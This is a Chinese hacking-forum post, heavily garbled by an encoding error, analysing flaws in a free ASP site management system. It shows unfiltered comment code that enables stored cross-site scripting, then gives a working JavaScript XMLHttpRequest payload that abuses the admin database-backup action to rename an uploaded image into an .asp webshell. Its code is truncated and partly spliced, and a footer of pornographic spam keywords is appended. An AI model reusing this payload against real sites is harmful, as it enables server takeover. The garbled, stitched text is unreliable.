曙海教育集團(tuán)論壇開(kāi)發(fā)語(yǔ)言培訓(xùn)專區(qū)SQL Server數(shù)據(jù)庫(kù) → 利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全


  共有8511人關(guān)注過(guò)本帖樹(shù)形打印

主題:利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全

美女呀,離線,留言給我吧!
wangxinxin
  1樓 個(gè)性首頁(yè) | 博客 | 信息 | 搜索 | 郵箱 | 主頁(yè) | UC


加好友 發(fā)短信
等級(jí):青蜂俠 帖子:1393 積分:14038 威望:0 精華:0 注冊(cè):2010-11-12 11:08:23
利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全  發(fā)帖心情 Post By:2010-12-13 13:47:46

前言:
???? 最近上cnzz下載了一套網(wǎng)站管理系統(tǒng),在源碼首頁(yè)發(fā)現(xiàn)它,心想cnzz都推薦應(yīng)該安全性相當(dāng)不錯(cuò)了.官方下載最新版本本地搭建IIS測(cè)試發(fā)現(xiàn)簡(jiǎn)潔易用,整體上安全做得不錯(cuò).由于是免費(fèi)版的,可能官方有點(diǎn)放水.不過(guò)這里不影響我們的分析,這里討論兩個(gè)方面:跨站的利用,SQL注射.還是一句話:重在思路.
一.隱藏的數(shù)據(jù)庫(kù)
分析代碼經(jīng)常要用到數(shù)據(jù)庫(kù)(我分析的是Access版本的) ,習(xí)慣性的打開(kāi)數(shù)據(jù)庫(kù),驚奇的發(fā)現(xiàn)只有一個(gè)notdown表,如圖01:
  
可是再仔細(xì)查看代碼發(fā)現(xiàn)不應(yīng)該只有這張表的,于是就想是不是隱藏起來(lái)了?第一次看到這種情況,于是就查看了下Access幫助說(shuō)明,在其中發(fā)現(xiàn)原來(lái)有還存在兩種屬性的數(shù)據(jù)表,即系統(tǒng)對(duì)象和隱藏對(duì)象.下面做一個(gè)小知識(shí)補(bǔ)充:
由于Access默認(rèn)是不顯示系統(tǒng)對(duì)象和隱藏對(duì)象的.所以如果一個(gè)表中存在隱藏對(duì)象或者系統(tǒng)對(duì)象那么就無(wú)法看到該表了. 簡(jiǎn)單說(shuō)下隱藏方法,設(shè)計(jì)好表后右擊表選擇"屬性"->"隱藏"屬性打勾,刷新下就看不到了,這樣就是隱藏對(duì)象了,默認(rèn)是看不到的.至于系統(tǒng)對(duì)象,我們可以修改表的前綴為 usys,這樣就可以把表改成一個(gè)系統(tǒng)對(duì)象.這兩種方法都可以.
既然可以隱藏當(dāng)然也可以恢復(fù)顯示了, 按如下操作:“工具”菜單->“選項(xiàng)”命令->“視圖”選項(xiàng)卡->選中“顯示”一欄下的“系統(tǒng)對(duì)象”復(fù)選框或者"隱藏對(duì)象"復(fù)選框,并按下“確定”按鈕,就可以重新顯示所有表了.如圖02
  
Ok了,數(shù)據(jù)就可以和正常的一樣了.
二.跨站的深入利用雞肋
首先看看漏洞文件/include/PlS.asp,查看代碼發(fā)現(xiàn)是一個(gè)評(píng)論顯示,在多個(gè)文件被包含了,代碼如下:  
"" then
??????Dim Author,Content,mycode
????Author=Trim(Request.Form("Author"))// 簡(jiǎn)單的過(guò)濾空格
????Content=Trim(Request.Form("Content")) //同上
????mycode = trim(request.form("code"))
??????if Author="" or Content="" then
??????Call Alert ("請(qǐng)?zhí)顚?xiě)完整再提交","-1")
????end if
????if mycodeSession("getcode") then
?????? Call Alert ("您輸入驗(yàn)證碼錯(cuò)誤","-1")
????end if
??????set rs = server.CreateObject ("adodb.recordset")
????sql="select * from zhi_rui_E_Pl"
????rs.open sql,conn,1,3
????rs.addnew
????rs("cli")=Request.Form("cli")
????rs("Ioid")=request.Form("Inid")
????rs("Author")=Author
????rs("Content")=Content
??------------------------省略部分代碼-------------------------------
%>

顯然沒(méi)有任何過(guò)濾,直接寫(xiě)入數(shù)據(jù)庫(kù),跨站產(chǎn)生了.由于數(shù)據(jù)庫(kù)是mdb格式的,所有插馬也沒(méi)用.這里就想到了是否可以備份數(shù)據(jù)庫(kù)?進(jìn)入后臺(tái)看到數(shù)據(jù)庫(kù)備份,查看如圖03:
  
看到了沒(méi),據(jù)庫(kù)路徑和備份文件名都不能修改,有些朋友可能就到這里停止,其實(shí)不然,還可以繼續(xù),經(jīng)驗(yàn)告訴我,他是將該輸入框?qū)懗蒱idden隱藏域了,查看文件/admin/Admin_Data.asp代碼如下:  
" size="40" />[/td]

看到這行type=hidden,猜測(cè)沒(méi)錯(cuò).那也就是說(shuō)同樣可以備份任意文件了.所有后臺(tái)拿shell比較簡(jiǎn)單了.(插馬備份數(shù)據(jù)庫(kù)比較麻煩,要繞過(guò)// 判斷瀏覽器類(lèi)型并定義創(chuàng)建xmlhttp會(huì)話
if (window.XMLHttpRequest)
{
??xmlhttp = new XMLHttpRequest();
} else if (window.ActiveXObject)
{
??try
??{
????xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
??}
??catch (e)
??{
????try
????{
??????xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
????}
????catch (e)
????{
????}
??}
}
function backup()
{
??var postStr = "DBpath=upload/2009082150598817.jpg&bkfolder=../DataBase/bak/&bkDBname=l4nk0r.asp";
??xmlhttp.open(&quot圖片點(diǎn)擊可在新窗口打開(kāi)查看OST","/admin/Admin_data.asp?action=RestoreData&act=Restore",true);
??xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
??xmlhttp.send(postStr);
}
Backup();

然后在你要提交的地方提交

支持(0中立(0反對(duì)(0單帖管理 | 引用 | 回復(fù) 回到頂部

返回版面帖子列表

利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全








簽名
主站蜘蛛池模板: 羞羞视频免费网站含羞草| 亚洲sss综合天堂久久久| 最近最新2019中文字幕全| 无码任你躁久久久久久| 加勒比一本大道香蕉在线视频| 91香蕉视频污污| 日韩小视频网站| 优优里番acg※里番acg绅士黑| www.成年人| 橘子没熟svk| 北条麻妃在线一区二区| h视频在线免费看| 成人品视频观看在线| 亚洲国产日韩精品| 美女扒开尿口直播| 少妇精品久久久一区二区三区| 亚洲国产一成人久久精品| 翁熄止痒婉艳隔壁老李头| 国产精品日韩欧美| 中国凸偷窥XXXX自由视频| 真实的国产乱xxxx在线| 国产无av码在线观看| jizz日本免费| 日本高清va在线播放| 亚洲精品短视频| 蜜桃成熟时无删减手机在线观看| 在线观看不卡视频| 久久久久久久综合综合狠狠| 正在播放宾馆露脸对白视频| 国产一区二区三区在线观看视频| 3344永久在线观看视频免费首页| 欧洲亚洲国产精华液| 免费日韩三级电影| 2017狠狠干| 性刺激久久久久久久久| 九九九好热在线| 波多野结衣办公室33分钟| 四虎影视永久免费观看网址| 99精品视频在线观看| 护士的诱惑电影| 免费日产乱码卡一卡|